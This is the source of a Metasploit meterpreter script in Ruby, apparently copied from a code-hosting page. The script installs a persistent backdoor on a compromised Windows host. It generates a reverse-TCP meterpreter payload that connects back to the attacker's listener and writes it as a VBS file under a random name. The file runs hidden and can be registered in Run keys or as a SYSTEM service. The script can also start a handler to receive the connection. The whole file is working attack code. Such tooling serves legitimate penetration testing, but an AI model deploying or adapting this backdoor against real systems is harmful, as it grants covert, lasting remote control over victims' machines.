244 lines
8.1 KiB
Ruby
244 lines
8.1 KiB
Ruby
##
|
|
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
|
|
# If you'd like to imporve this script, please try to port it as a post
|
|
# module instead. Thank you.
|
|
##
|
|
|
|
|
|
|
|
# Author: Carlos Perez at carlos_perez[at]darkoperator.com
|
|
#-------------------------------------------------------------------------------
|
|
################## Variable Declarations ##################
|
|
|
|
# Meterpreter Session
|
|
@client = client
|
|
|
|
key = "HKLM"
|
|
|
|
# Default parameters for payload
|
|
rhost = Rex::Socket.source_address("1.2.3.4")
|
|
rport = 4444
|
|
delay = 5
|
|
install = false
|
|
autoconn = false
|
|
serv = false
|
|
altexe = nil
|
|
target_dir = nil
|
|
payload_type = "windows/meterpreter/reverse_tcp"
|
|
script = nil
|
|
script_on_target = nil
|
|
|
|
|
|
@exec_opts = Rex::Parser::Arguments.new(
|
|
"-h" => [ false, "This help menu"],
|
|
"-r" => [ true, "The IP of the system running Metasploit listening for the connect back"],
|
|
"-p" => [ true, "The port on the remote host where Metasploit is listening"],
|
|
"-i" => [ true, "The interval in seconds between each connection attempt"],
|
|
"-X" => [ false, "Automatically start the agent when the system boots"],
|
|
"-U" => [ false, "Automatically start the agent when the User logs on"],
|
|
"-S" => [ false, "Automatically start the agent on boot as a service (with SYSTEM privileges)"],
|
|
"-A" => [ false, "Automatically start a matching multi/handler to connect to the agent"],
|
|
"-L" => [ true, "Location in target host where to write payload to, if none \%TEMP\% will be used."],
|
|
"-T" => [ true, "Alternate executable template to use"],
|
|
"-P" => [ true, "Payload to use, default is windows/meterpreter/reverse_tcp."]
|
|
)
|
|
meter_type = client.platform
|
|
|
|
################## Function Declarations ##################
|
|
|
|
# Usage Message Function
|
|
#-------------------------------------------------------------------------------
|
|
def usage
|
|
print_line "Meterpreter Script for creating a persistent backdoor on a target host."
|
|
print_line(@exec_opts.usage)
|
|
raise Rex::Script::Completed
|
|
end
|
|
|
|
# Wrong Meterpreter Version Message Function
|
|
#-------------------------------------------------------------------------------
|
|
def wrong_meter_version(meter = meter_type)
|
|
print_error("#{meter} version of Meterpreter is not supported with this Script!")
|
|
raise Rex::Script::Completed
|
|
end
|
|
|
|
# Function for Creating the Payload
|
|
#-------------------------------------------------------------------------------
|
|
def create_payload(payload_type,lhost,lport)
|
|
print_status("Creating Payload=#{payload_type} LHOST=#{lhost} LPORT=#{lport}")
|
|
payload = payload_type
|
|
pay = client.framework.payloads.create(payload)
|
|
pay.datastore['LHOST'] = lhost
|
|
pay.datastore['LPORT'] = lport
|
|
return pay.generate
|
|
end
|
|
|
|
# Function for Creating persistent script
|
|
#-------------------------------------------------------------------------------
|
|
def create_script(delay,altexe,raw)
|
|
if altexe
|
|
vbs = ::Msf::Util::EXE.to_win32pe_vbs(@client.framework, raw, {:persist => true, :delay => delay, :template => altexe})
|
|
else
|
|
vbs = ::Msf::Util::EXE.to_win32pe_vbs(@client.framework, raw, {:persist => true, :delay => delay})
|
|
end
|
|
print_status("Persistent agent script is #{vbs.length} bytes long")
|
|
return vbs
|
|
end
|
|
|
|
# Function for creating log folder and returning log path
|
|
#-------------------------------------------------------------------------------
|
|
def log_file(log_path = nil)
|
|
#Get hostname
|
|
host = @client.sys.config.sysinfo["Computer"]
|
|
|
|
# Create Filename info to be appended to downloaded files
|
|
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
|
|
|
|
# Create a directory for the logs
|
|
if log_path
|
|
logs = ::File.join(log_path, 'logs', 'persistence', Rex::FileUtils.clean_path(host + filenameinfo) )
|
|
else
|
|
logs = ::File.join(Msf::Config.log_directory, 'persistence', Rex::FileUtils.clean_path(host + filenameinfo) )
|
|
end
|
|
|
|
# Create the log directory
|
|
::FileUtils.mkdir_p(logs)
|
|
|
|
#logfile name
|
|
logfile = logs + ::File::Separator + Rex::FileUtils.clean_path(host + filenameinfo) + ".rc"
|
|
return logfile
|
|
end
|
|
|
|
# Function for writing script to target host
|
|
#-------------------------------------------------------------------------------
|
|
def write_script_to_target(target_dir,vbs)
|
|
if target_dir
|
|
tempdir = target_dir
|
|
else
|
|
tempdir = @client.sys.config.getenv('TEMP')
|
|
end
|
|
tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
|
|
fd = @client.fs.file.new(tempvbs, "wb")
|
|
fd.write(vbs)
|
|
fd.close
|
|
print_good("Persistent Script written to #{tempvbs}")
|
|
file_local_write(@clean_up_rc, "rm #{tempvbs}\n")
|
|
return tempvbs
|
|
end
|
|
|
|
# Function for setting multi handler for autocon
|
|
#-------------------------------------------------------------------------------
|
|
def set_handler(selected_payload,rhost,rport)
|
|
print_status("Starting connection handler at port #{rport} for #{selected_payload}")
|
|
mul = client.framework.exploits.create("multi/handler")
|
|
mul.datastore['WORKSPACE'] = @client.workspace
|
|
mul.datastore['PAYLOAD'] = selected_payload
|
|
mul.datastore['LHOST'] = rhost
|
|
mul.datastore['LPORT'] = rport
|
|
mul.datastore['EXITFUNC'] = 'process'
|
|
mul.datastore['ExitOnSession'] = false
|
|
|
|
mul.exploit_simple(
|
|
'Payload' => mul.datastore['PAYLOAD'],
|
|
'RunAsJob' => true
|
|
)
|
|
print_good("Multi/Handler started!")
|
|
end
|
|
|
|
# Function to execute script on target and return the PID of the process
|
|
#-------------------------------------------------------------------------------
|
|
def targets_exec(script_on_target)
|
|
print_status("Executing script #{script_on_target}")
|
|
proc = session.sys.process.execute("cscript \"#{script_on_target}\"", nil, {'Hidden' => true})
|
|
print_good("Agent executed with PID #{proc.pid}")
|
|
file_local_write(@clean_up_rc, "kill #{proc.pid}\n")
|
|
return proc.pid
|
|
end
|
|
|
|
# Function to insytall payload in to the registry HKLM or HKCU
|
|
#-------------------------------------------------------------------------------
|
|
def write_to_reg(key,script_on_target)
|
|
nam = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
print_status("Installing into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}")
|
|
if(key)
|
|
registry_setvaldata("#{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",nam,script_on_target,"REG_SZ")
|
|
print_good("Installed into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}")
|
|
file_local_write(@clean_up_rc, "reg deleteval -k '#{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' -v #{nam}\n")
|
|
else
|
|
print_error("Error: failed to open the registry key for writing")
|
|
end
|
|
end
|
|
# Function to install payload as a service
|
|
#-------------------------------------------------------------------------------
|
|
def install_as_service(script_on_target)
|
|
if not is_uac_enabled? or is_admin?
|
|
print_status("Installing as service..")
|
|
nam = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
print_status("Creating service #{nam}")
|
|
service_create(nam, nam, "cscript \"#{script_on_target}\"")
|
|
file_local_write(@clean_up_rc, "execute -H -f sc -a \"delete #{nam}\"\n")
|
|
else
|
|
print_error("Insufficient privileges to create service")
|
|
end
|
|
end
|
|
|
|
|
|
################## Main ##################
|
|
@exec_opts.parse(args) { |opt, idx, val|
|
|
case opt
|
|
when "-h"
|
|
usage
|
|
when "-r"
|
|
rhost = val
|
|
when "-p"
|
|
rport = val.to_i
|
|
when "-i"
|
|
delay = val.to_i
|
|
when "-X"
|
|
install = true
|
|
key = "HKLM"
|
|
when "-S"
|
|
serv = true
|
|
when "-U"
|
|
install = true
|
|
key = "HKCU"
|
|
when "-A"
|
|
autoconn = true
|
|
when "-L"
|
|
target_dir = val
|
|
when "-T"
|
|
altexe = val
|
|
when "-P"
|
|
payload_type = val
|
|
end
|
|
}
|
|
|
|
# Check for Version of Meterpreter
|
|
wrong_meter_version(meter_type) if meter_type !~ /win32|win64/i
|
|
print_status("Running Persistance Script")
|
|
# Create undo script
|
|
@clean_up_rc = log_file()
|
|
print_status("Resource file for cleanup created at #{@clean_up_rc}")
|
|
# Create and Upload Payload
|
|
raw = create_payload(payload_type,rhost,rport)
|
|
script = create_script(delay,altexe,raw)
|
|
script_on_target = write_script_to_target(target_dir,script)
|
|
|
|
# Start Multi/Handler
|
|
if autoconn
|
|
set_handler(payload_type,rhost,rport)
|
|
end
|
|
|
|
# Execute on target host
|
|
targets_exec(script_on_target)
|
|
|
|
# Install in registry
|
|
if install
|
|
write_to_reg(key,script_on_target)
|
|
end
|
|
|
|
# Install as a service
|
|
if serv
|
|
install_as_service(script_on_target)
|
|
end
|
|
|